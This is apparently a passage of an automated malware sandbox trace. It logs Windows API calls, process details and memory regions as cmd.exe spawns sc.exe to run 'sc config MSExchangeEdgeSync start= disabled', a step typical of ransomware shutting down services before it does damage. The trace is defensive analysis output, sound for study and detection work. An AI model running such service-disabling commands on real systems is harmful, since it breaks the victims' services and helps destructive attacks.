returned 3 [0129.766] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.766] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.766] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.766] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.766] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.766] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0129.766] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0129.766] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0129.766] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0129.766] SetErrorMode (uMode=0x0) returned 0x0 [0129.766] SetErrorMode (uMode=0x1) returned 0x0 [0129.766] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4df05d0, lpFilePart=0x4aaf56c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4aaf56c*="Desktop") returned 0x1d [0129.766] SetErrorMode (uMode=0x0) returned 0x1 [0129.766] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.766] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.774] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.774] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.774] GetConsoleTitleW (in: lpConsoleTitle=0x4aaf7ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.774] InitializeProcThreadAttributeList (in: lpAttributeList=0x4aaf718, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4aaf6fc | out: lpAttributeList=0x4aaf718, lpSize=0x4aaf6fc) returned 1 [0129.774] UpdateProcThreadAttribute (in: lpAttributeList=0x4aaf718, dwFlags=0x0, Attribute=0x60001, lpValue=0x4aaf704, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4aaf718, lpPreviousValue=0x0) returned 1 [0129.774] GetStartupInfoW (in: lpStartupInfo=0x4aaf750 | out: lpStartupInfo=0x4aaf750*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0129.774] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0129.775] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0129.775] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.776] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeEdgeSync start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4aaf6a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeEdgeSync start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4aaf6ec | out: lpCommandLine="sc config MSExchangeEdgeSync start= disabled", lpProcessInformation=0x4aaf6ec*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe18, dwThreadId=0xf34)) returned 1 [0129.782] CloseHandle (hObject=0xa4) returned 1 [0129.782] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.782] GetEnvironmentStringsW () returned 0x4df9f08* [0129.782] FreeEnvironmentStringsA (penv="=") returned 1 [0129.782] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0129.828] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4aaf684 | out: lpExitCode=0x4aaf684*=0x424) returned 1 [0129.829] CloseHandle (hObject=0xa8) returned 1 [0129.829] _vsnwprintf (in: _Buffer=0x4aaf76c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4aaf68c | out: _Buffer="00000424") returned 8 [0129.829] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0129.829] GetEnvironmentStringsW () returned 0x4dfb398* [0129.829] FreeEnvironmentStringsA (penv="=") returned 1 [0129.829] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.829] GetEnvironmentStringsW () returned 0x4dfb398* [0129.829] FreeEnvironmentStringsA (penv="=") returned 1 [0129.829] DeleteProcThreadAttributeList (in: lpAttributeList=0x4aaf718 | out: lpAttributeList=0x4aaf718) [0129.829] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.829] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.829] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.829] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.829] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.829] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.830] SetConsoleInputExeNameW () returned 0x1 [0129.830] GetConsoleOutputCP () returned 0x1b5 [0129.830] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.830] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.830] exit (_Code=1060) Thread: id = 443 os_tid = 0xe34 Process: id = "123" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x63169000" os_pid = "0xdf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "122" os_parent_pid = "0xf48" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6964 start_va = 0x7f064000 end_va = 0x7f064fff entry_point = 0x0 region_type = private name = "private_0x000000007f064000" filename = "" Region: id = 6965 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6966 start_va = 0x12c3b0000 end_va = 0x12c3cffff entry_point = 0x0 region_type = private name = "private_0x000000012c3b0000" filename = "" Region: id = 6967 start_va = 0x12c3d0000 end_va = 0x12c3e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000012c3d0000" filename = "" Region: id = 6968 start_va = 0x12c3f0000 end_va = 0x12c42ffff entry_point = 0x0 region_type = private name = "private_0x000000012c3f0000" filename = "" Region: id = 6969 start_va = 0x7df5ffbd0000 end_va = 0x7ff5ffbcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbd0000" filename = "" Region: id = 6970 start_va = 0x7ff6c40d0000 end_va = 0x7ff6c40f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c40d0000" filename = "" Region: id = 6971 start_va = 0x7ff6c40fd000 end_va = 0x7ff6c40fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40fd000" filename = "" Region: id = 6972 start_va = 0x7ff6c40fe000 end_va = 0x7ff6c40fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40fe000" filename = "" Region: id = 6973 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6974 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6975 start_va = 0x12c3b0000 end_va = 0x12c3bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000012c3b0000" filename = "" Region: id = 6976 start_va = 0x12c3c0000 end_va = 0x12c3c6fff entry_point = 0x0 region_type = private name = "private_0x000000012c3c0000" filename = "" Region: id = 6977 start_va = 0x12c430000 end_va = 0x12c430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000012c430000" filename = "" Region: id = 6978 start_va = 0x12c440000 end_va = 0x12c446fff entry_point = 0x0 region_type = private name = "private_0x000000012c440000" filename = "" Region: id = 6979 start_va = 0x12c450000 end_va = 0x12c450fff entry_point = 0x0 region_type = private name = "private_0x000000012c450000" filename = "" Region: id = 6980 start_va = 0x12c460000 end_va = 0x12c55ffff entry_point = 0x0 region_type = private name = "private_0x000000012c460000" filename = "" Region: id = 6981 start_va = 0x12c560000 end_va = 0x12c61dfff entry_point = 0x12c560000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6982 start_va = 0x12c620000 end_va = 0x12c65ffff entry_point = 0x0 region_type = private name = "private_0x000000012c620000" filename = "" Region: id = 6983 start_va = 0x12c660000 end_va = 0x12c660fff entry_point = 0x0 region_type = private name = "private_0x000000012c660000" filename = "" Region: id = 6984 start_va = 0x12c7e0000 end_va = 0x12c7effff entry_point = 0x0 region_type = private name = "private_0x000000012c7e0000" filename = "" Region: id = 6985 start_va = 0x12c7f0000 end_va = 0x12c977fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000012c7f0000" filename = "" Region: id = 6986 start_va = 0x12c980000 end_va = 0x12cb00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000012c980000" filename = "" Region: id = 6987 start_va = 0x12cb10000 end_va = 0x12df0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000012cb10000" filename = "" Region: id = 6988 start_va = 0x7ff6c3fd0000 end_va = 0x7ff6c40cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3fd0000" filename = "" Region: id = 6989 start_va = 0x7ff6c40fb000 end_va = 0x7ff6c40fcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c40fb000" filename = "" Region: id = 6990 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6991 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6992 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6993 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6994 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6995 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6996 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6997 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6998 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6999 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7000 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7001 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7002 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7003 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 440 os_tid = 0xddc Thread: id = 441 os_tid = 0xde4 Thread: id = 442 os_tid = 0xe20 Process: id = "124" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x40ba0000" os_pid = "0xe18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "122" os_parent_pid = "0xf48" cmd_line = "sc config MSExchangeEdgeSync start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7017 start_va = 0xa90000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 7018 start_va = 0xab0000 end_va = 0xab1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 7019 start_va = 0xac0000 end_va = 0xad3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 7020 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 7021 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 7022 start_va = 0xb60000 end_va = 0xb63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 7023 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 7024 start_va = 0xb80000 end_va = 0xb81fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 7025 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7026 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7027 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7028 start_va = 0x7f2d0000 end_va = 0x7f2f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2d0000" filename = "" Region: id = 7029 start_va = 0x7f2f5000 end_va = 0x7f2f5fff entry_point = 0x0 region_type = private name = "private_0x000000007f2f5000" filename = "" Region: id = 7030 start_va = 0x7f2fc000 end_va = 0x7f2fefff entry_point = 0x0 region_type = private name = "private_0x000000007f2fc000" filename = "" Region: id = 7031 start_va = 0x7f2ff000 end_va = 0x7f2fffff entry_point = 0x0 region_type = private name = "private_0x000000007f2ff000" filename = "" Region: id = 7032 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7033 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7034 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7035 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7036 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7037 start_va = 0xbb0000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 7038 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7039 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7040 start_va = 0xd10000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 7041 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7042 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 7043 start_va = 0xaa0000 end_va = 0xaa3fff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 7044 start_va = 0xbc0000 end_va = 0xc7dfff entry_point = 0xbc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7045 start_va = 0xc80000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 7046 start_va = 0xcc0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 7047 start_va = 0xe40000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 7048 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7049 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7050 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7051 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7052 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7053 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7054 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7055 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7056 start_va = 0x7f1d0000 end_va = 0x7f2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1d0000" filename = "" Region: id = 7057 start_va = 0x7f2f9000 end_va = 0x7f2fbfff entry_point = 0x0 region_type = private name = "private_0x000000007f2f9000" filename = "" Region: id = 7058 start_va = 0x4ea0000 end_va = 0x4f7efff entry_point = 0x4ea0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7059 start_va = 0xb90000 end_va = 0xba1fff entry_point = 0xb90000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 444 os_tid = 0xf34 [0129.817] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0129.817] __set_app_type (_Type=0x1) [0129.817] __p__fmode () returned 0x77ac4d6c [0129.817] __p__commode () returned 0x77ac5b1c [0129.817] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0129.817] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0129.818] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.820] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0129.820] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0129.820] _wcsicmp (_String1="config", _String2="query") returned -14 [0129.820] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0129.820] _wcsicmp (_String1="config", _String2="start") returned -16 [0129.820] _wcsicmp (_String1="config", _String2="pause") returned -13 [0129.820] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0129.820] _wcsicmp (_String1="config", _String2="control") returned -14 [0129.820] _wcsicmp (_String1="config", _String2="continue") returned -14 [0129.820] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.820] _wcsicmp (_String1="config", _String2="config") returned 0 [0129.820] ResolveDelayLoadedAPI () returned 0x77262c10 [0129.820] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xd18550 [0129.822] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0129.822] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0129.822] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0129.822] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0129.822] _wcsicmp (_String1="disabled", _String2="auto") returned 3 